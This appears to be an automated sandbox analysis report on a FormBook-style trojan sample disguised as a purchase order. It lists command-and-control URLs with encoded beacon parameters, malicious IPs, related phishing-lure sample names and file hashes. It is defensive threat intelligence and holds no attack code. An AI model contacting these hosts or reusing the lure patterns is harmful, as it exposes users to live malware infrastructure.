http://www.moritynomxd.xyz/v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= | false | Avira URL Cloud: safe | unknown
http://www.wcq24.top/i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0= | false | Avira URL Cloud: safe | unknown
http://www.warriorsyndrome.net/kzas/ | false | Avira URL Cloud: safe | unknown
http://www.sppsuperplast.online/becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM= | false | Avira URL Cloud: safe | unknown
http://www.cc101.pro/4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.warriorsyndrome.net/kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.ks1x7i.vip/uxh9/ | false | Avira URL Cloud: safe | unknown
http://www.pakmartcentral.shop/ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.les-massage.online/74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.galaxyslot88rtp.lat/lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk= | false | Avira URL Cloud: safe | unknown
http://www.galaxyslot88rtp.lat/lbpf/ | false | Avira URL Cloud: safe | unknown
http://www.rtpngk.xyz/876i/ | false | Avira URL Cloud: safe | unknown
http://www.wcq24.top/i557/ | false | Avira URL Cloud: safe | unknown
http://www.pakmartcentral.shop/ml5l/ | false | Avira URL Cloud: safe | unknown
http://www.sterkus.xyz/ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.asociacia.online/bf6k/ | false | Avira URL Cloud: safe | unknown
http://www.tracy.club/fl4z/ | false | Avira URL Cloud: safe | unknown
http://www.kovallo.cloud/kmgk/ | false | Avira URL Cloud: safe | unknown
http://www.sppsuperplast.online/becc/ | false | Avira URL Cloud: safe | unknown
http://www.sterkus.xyz/ha8h/ | false | Avira URL Cloud: safe | unknown
http://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.deefbank.net/1y6y/ | false | Avira URL Cloud: safe | unknown
http://www.syncnodex.net/xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.syncnodex.net/xx1z/ | false | Avira URL Cloud: safe | unknown
http://www.asociacia.online/bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.kovallo.cloud/kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.cc101.pro/4hfb/ | false | Avira URL Cloud: safe | unknown
http://www.les-massage.online/74ou/ | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://htmlcodex.com | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reg.ru | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.jsdelivr.net/npm/bootstrap | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.deefbank.net | drBzjAnGBElC.exe, 00000003.00000002.4633344393.000000000822E000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://156.226.108.98:58888/ | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULp | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007912000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005C22000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.les-massage.online&rand= | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://code.jquery.com/jquery-3.4.1.min.js | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl- | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.jsdelivr.net/npm/bootstrap-icons | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t.me/AG09999 | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000075EE000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4629372081.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000058FE000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land | drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000007138000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000005448000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000072CA000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000055DA000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://htmlcodex.com/credit-removal | drBzjAnGBElC.exe, 00000003.00000002.4631661117.00000000067CC000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | replace.exe, 00000004.00000003.2466217797.00000000082ED000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.95.29 | www.sterkus.xyz | United States | 31744 | MULTIBAND-NEWHOPEUS | true
84.32.84.32 | pakmartcentral.shop | Lithuania | 33922 | NTT-LT-ASLT | false
81.2.196.19 | asociacia.online | Czech Republic | 24806 | INTERNET-CZKtis238403KtisCZ | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
172.81.61.224 | www.moritynomxd.xyz | United States | 22552 | ESITEDUS | true
142.250.185.115 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
188.114.97.3 | www.cc101.pro | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | www.rtpngk.xyz | European Union | 13335 | CLOUDFLARENETUS | true
46.17.172.49 | galaxyslot88rtp.lat | Germany | 47583 | AS-HOSTINGERLT | false
154.23.184.240 | wcq24.top | United States | 174 | COGENT-174US | false
194.58.112.174 | www.les-massage.online | Russian Federation | 197695 | AS-REGRU | false
3.33.130.190 | tracy.club | United States | 8987 | AMAZONEXPANSIONGB | false
15.197.172.60 | www.syncnodex.net | United States | 7430 | TANDEMUS | false
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1515416
                                                                Start date and time:2024-09-22 17:39:44 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:PO2024033194.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@16/13
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 48
                                                                • Number of non-executed functions: 306
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: PO2024033194.exe
Time | Type | Description
11:41:27 | API Interceptor | 10766323x Sleep call for process: replace.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
209.74.95.29 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.pofgof.pro/gfz9/
84.32.84.32 | RECIEPT.PDF.exe | malicious | FormBook | www.pakmartcentral.shop/vjx2/
84.32.84.32 | DHL Arrive Notice doc pdf.exe | malicious | FormBook | www.qriem.com/2tnc/
84.32.84.32 | SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe | malicious | FormBook | www.dfmagazine.shop/wc8m/?In3=AzvpidDp&6JAhxhQ=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZgLMwl2zsPPksSh5ucr6CA17E1wkvEUc1n0CmK9rdseNyUg==
84.32.84.32 | 2nd RFQ TECMARKQATAR PO33218_PDF.exe | malicious | FormBook | www.servehimfoundation.org/lp08/?mnShvP=hZRrlAOg9Cc11yMPXElysVdslrUOxqPvxv7mb/LWN/R8ZQj+E9ZrTE6ldQgl2DvoxGl0EVvUl/xss71F3eAnCvB+UJch5C5oTNbGviL38V1Dt27EfV1x4H4=&Cbj=nB9LWdWpMT7tUBt
84.32.84.32 | ncOLm62YLB.exe | malicious | FormBook | www.glintra.cyou/eaxv/
84.32.84.32 | PO76389.exe | malicious | FormBook | www.parcelfly.net/n59g/
84.32.84.32 | k8FSEGGo4d9blGr.exe | malicious | FormBook | www.glitterinthegrey.shop/rei7/
84.32.84.32 | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | www.parcelfly.net/n59g/
84.32.84.32 | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | www.servehimfoundation.org/lp08/
84.32.84.32 | RFQ-TECMARKQATAR PO33109.xlsx | malicious | FormBook | www.dfmagazine.shop/wc8m/?kxfp9=-6Mh&oXfTz=LNw/HBPP4tr5bvxRp17Hk/kExWr2oyZ3YB7NlE9rWxPCxu7fGi7WVymEaD0ez69xv6ZMfJiRCRJpj+4TPiEl4bd+hmDlK6IeawRubruAKHje0xl8dFknm0izH9S6
81.2.196.19 | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | www.asociacia.online/jsqu/
81.2.196.19 | New Purchase Order.exe | malicious | FormBook | www.asociacia.online/onev/
81.2.196.19 | Sandflugters.exe | malicious | FormBook, GuLoader | www.efektivniterapie.online/tsq7/
81.2.196.19 | SSCTEC9201.exe | malicious | FormBook | www.sedrik-osvald.online/m2x5/?YvT=KDH4Ppt8a8oLaN3p&v2J=B8Bd0Sfq77kDc24XyFdDXGPlMrQ7NxXLrTlUZzrnlAP4fhGKbqg2y3GNcrlB5q+LumL4VPx44Q==
81.2.196.19 | ACH PAYMENT 1192022pdf.exe | malicious | FormBook | www.maku-pro.online/ma27/?j2=jNDy8wSiFoz7se3IREk5N364hjCCwoYyTNWUbGZMTg86DNUHcq3c8A2kAWt7EWCkv4mkH3c4vQ==&-Zc=-ZAdTpT8Cf
81.2.196.19 | 07aTSiH01G.exe | malicious | FormBook, GuLoader | www.kittycatastrophe.com/ne6z/?0N60=e0GlN6KPU&A8SD=Y2A11byKZUZMS1hlf842E/RmyAMNscsVAGalVIqYPZA3++Uv5dXsl8O0tdZQsiHykM3ibVkf+qS9xpnv2GfFKJmS01C8pP3vIQ==
81.2.196.19 | PO97421800.exe | malicious | FormBook | www.kittycatastrophe.com/qdv3/?4hy8Q8=JsWBh0Ouo7iPrZeVkgjgpsCxrRXN8DZIPDwfqT3tUakaQF1R0vva/x4hhD3n5plmuauGyWTPBUUElkC9ZpnHKzdpRh7hqvzJNpujLQ+xVQPe&2dv8Z=S6A8sb4P3nm
81.2.196.19 | IMG_101922.exe | malicious | FormBook | www.kittycatastrophe.com/ne6z/?n2MxbD=v4Il9BC&3fi=Y2A11byKZUZMS1hlf842E/RmyAMNscsVAGalVIqYPZA3++Uv5dXsl8O0tdZQsiHykM3ibVkf+qS9xpnv2GfFKJmS01C8pP3vIQ==
81.2.196.19 | PO#20990_Sept_Order.exe | malicious | FormBook, GuLoader | www.rezidencecechovaprerov.online/de28/?i87=17vDC5FFQTPlGizA74Ak55na4DsykkDYnEC/uJJ+zVbbU9ytZo1iO4RKjN84/27APiYJ&3f=9r9l2h3
81.2.196.19 | Updrag.exe | malicious | FormBook, GuLoader | www.avatame.online/niku/?7nFlllx=3VrQF/tRbPjx73bOmiQ5cPIn9APV2F2cudNZi8mITKQESaOmZwkUkGMRo6DTdBgPja21K7lwwmql7y5TVUc0R+3pGNAdhu+75g==&u4=UvZXQxCPphTT6J
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.cc101.pro | PURCHASE ORDER-6350.exe | malicious | FormBook | 188.114.96.3
natroredirect.natrocdn.com | FvYlbhvZrZ.rtf | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | file.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | file.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | Quote 05-302.lnk | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | LgzpILNkS2.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | ncOLm62YLB.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | PAGO $830.900.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | New Purchase Order.exe | malicious | FormBook | 85.159.66.93
natroredirect.natrocdn.com | PO2-2401-0016 (TR).exe | malicious | FormBook | 85.159.66.93
www.rtpngk.xyz | DOC092024-0431202229487.exe | malicious | FormBook | 188.114.97.3
www.moritynomxd.xyz | ncOLm62YLB.exe | malicious | FormBook | 172.81.61.224
www.les-massage.online | ncOLm62YLB.exe | malicious | FormBook | 194.58.112.174
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTT-LT-ASLT | RECIEPT.PDF.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | DHL Arrive Notice doc pdf.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | 2nd RFQ TECMARKQATAR PO33218_PDF.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | ncOLm62YLB.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | Fatura.pdf | malicious | Unknown | 84.32.84.32
NTT-LT-ASLT | GestionPagoAProveedores_100920241725998901306_PDF.cmd | malicious | Remcos, DBatLoader, FormBook | 84.32.84.196
NTT-LT-ASLT | PO76389.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | k8FSEGGo4d9blGr.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 84.32.84.32
CIZGITR | FvYlbhvZrZ.rtf | malicious | FormBook | 85.159.66.93
CIZGITR | SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx | malicious | FormBook | 85.159.66.93
CIZGITR | Ziraat Bankası Swift Mesajı.exe | malicious | Snake Keylogger, VIP Keylogger | 185.22.186.213
CIZGITR | file.exe | malicious | FormBook | 85.159.66.93
CIZGITR | file.exe | malicious | FormBook | 85.159.66.93
CIZGITR | Quote 05-302.lnk | malicious | FormBook | 85.159.66.93
CIZGITR | LgzpILNkS2.exe | malicious | FormBook | 85.159.66.93
CIZGITR | ncOLm62YLB.exe | malicious | FormBook | 85.159.66.93
CIZGITR | PAGO $830.900.exe | malicious | FormBook | 85.159.66.93
CIZGITR | New Purchase Order.exe | malicious | FormBook | 85.159.66.93
INTERNET-CZKtis238403KtisCZ | SOLICITUD DE COTIZACIÓN - 6721000232111.exe | malicious | FormBook | 81.2.196.19
INTERNET-CZKtis238403KtisCZ | New Purchase Order.exe | malicious | FormBook | 81.2.196.19
INTERNET-CZKtis238403KtisCZ | ExeFile (156).exe | malicious | Emotet | 81.2.235.111
INTERNET-CZKtis238403KtisCZ | ExeFile (171).exe | malicious | Emotet | 81.2.235.111
INTERNET-CZKtis238403KtisCZ | VvlYJBzLuW.elf | malicious | Mirai | 194.182.83.4
INTERNET-CZKtis238403KtisCZ | UDxMi3I3lO.exe | malicious | PureLog Stealer, SystemBC | 81.2.194.105
INTERNET-CZKtis238403KtisCZ | DPqKF5vqpe.exe | malicious | LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC | 81.2.195.204
INTERNET-CZKtis238403KtisCZ | DASERA LPO PMT-4 FURNITURE 28052024.pdf.exe | malicious | FormBook | 81.2.195.12
INTERNET-CZKtis238403KtisCZ | nUjgRSb1i7.elf | malicious | Mirai, Gafgyt, Okiru | 80.211.203.249
INTERNET-CZKtis238403KtisCZ | rfdJU2NvQi.elf | malicious | Mirai, Gafgyt, Okiru | 80.211.203.249
MULTIBAND-NEWHOPEUS | PURCHASE ORDER-6350.exe | malicious | FormBook | 209.74.95.29
MULTIBAND-NEWHOPEUS | Untitled.eml | malicious | EvilProxy, HTMLPhisher | 209.74.66.140
MULTIBAND-NEWHOPEUS | Untitled.eml | malicious | Unknown | 209.74.66.140
MULTIBAND-NEWHOPEUS | EF520_B18Payment_2600_D3781_N3895_L1029_H482_X4782_E3819.exe | malicious | Unknown | 209.74.95.146
MULTIBAND-NEWHOPEUS | https://lookerstudio.google.com/s/u2hbu8O7xHg | malicious | EvilProxy, HTMLPhisher | 209.74.66.141
MULTIBAND-NEWHOPEUS | ibero.bat | malicious | SilverRat | 209.74.95.136
MULTIBAND-NEWHOPEUS | CY51PaymentAUG-38122-507-783-17531I-39UW-J471-3017-3C762-M732.exe | malicious | PureLog Stealer, zgRAT | 209.74.95.146
MULTIBAND-NEWHOPEUS | H#Payment03-28S2-J5892-C938-KL105-DN782-FN823-CD47912-SC8923-19574.exe | malicious | PureLog Stealer, zgRAT | 209.74.95.146
MULTIBAND-NEWHOPEUS | X4kQxc5ZQW | malicious | Unknown | 209.74.85.117
MULTIBAND-NEWHOPEUS | e8AjLx6Lex | malicious | Mirai | 209.74.85.106
                                                                Process:C:\Windows\SysWOW64\replace.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1239949490932863
                                                                Encrypted:false
                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\PO2024033194.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):287232
                                                                Entropy (8bit):7.994900553375555
                                                                Encrypted:true
                                                                SSDEEP:6144:vOlQEven4RUlRJbWvqrVbQ6xF2OM+3r17D1G76FqgQHJc5FzRyqpmun:NEven4GzbbQy/vrlD1NoJJcbzRyqpd
                                                                MD5:2888406AC91571338B951A3911E40F1F
                                                                SHA1:0BDE462AAD3BEF150B13479A66B813464D6950FB
                                                                SHA-256:86919A292728EEC1CB2621CCA281E71923736DDD6FE97554CF945D428EF141CD
                                                                SHA-512:61A61DCB58ABCE72ABDF6EBA914C3B8485FE866DF4FC96021388985318955FF1A49378C648914EC52ECB56A4EA63451381BCA764814AC2EDE99EF5557169C786
                                                                Malicious:false
                                                                Reputation:low
